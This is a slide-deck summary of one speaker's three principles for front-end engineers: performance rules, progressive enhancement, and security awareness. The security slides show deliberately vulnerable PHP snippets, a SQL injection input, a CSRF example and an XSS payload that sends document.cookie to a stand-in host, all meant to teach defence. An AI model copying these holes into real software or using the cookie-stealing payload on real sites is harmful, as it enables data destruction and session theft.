This document outlines three "creeds" or principles for front-end engineers according to Morgan Cheng. Creed I states that performance is a key feature and outlines best practices like minimizing HTTP requests and assets. Creed II discusses progressive enhancement and building web pages that degrade gracefully across browsers. Creed III states the importance of being paranoid about security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF) by never trusting user input.
19. 14 Performance Best Practices Make fewer HTTP requests Use a CDN Add an Expires header Gzip components Put CSS at the top Move JS to the bottom Avoid CSS expressions Make JS and CSS external Reduce DNS lookups Minify JS Avoid redirects Remove duplicate scripts Turn off ETags Make AJAX cacheable and small
20. More … … Minimize DOM Operations Develop Smart Event Handlers Preload Components … http://developer.yahoo.com/performance/rules.html
33. What’s wrong with this Code? <?php … $sql = “DELETE * FROM users WHERE name = ‘” . $_POST[‘username’] . “’”; $result = mysql_query($sql); ?>
34. SQL Injection Attack <?php … $sql = “DELETE * FROM users WHERE name = ‘” . $_POST[‘username’] . “’”; $result = mysql_query($sql); ?> What if $_POST[’username’] is “x’ OR ‘1’=‘1” ?
35. What’s wrong with this Code? <div> You are referred from <?php echo $_GET[‘from’]; ?> </div>
36. XSS Attack <div> You are referred from <?php echo $_GET[‘from’]; ?> </div> What if the URL is “http://www.yahoo.com/?from=</div><script>document.location='http://www.eval.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
37. Your Cookie is Stolen <div> You are referred from </div><script>document.location='http://www.eval.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> </div>
38. What’s wrong with this Code? <?php if (user_is_login()) { delete_something(); } ?>
39. CSRF Attack <?php if (user_is_login()) { delete_something(); } ?> The request might not be user’s intention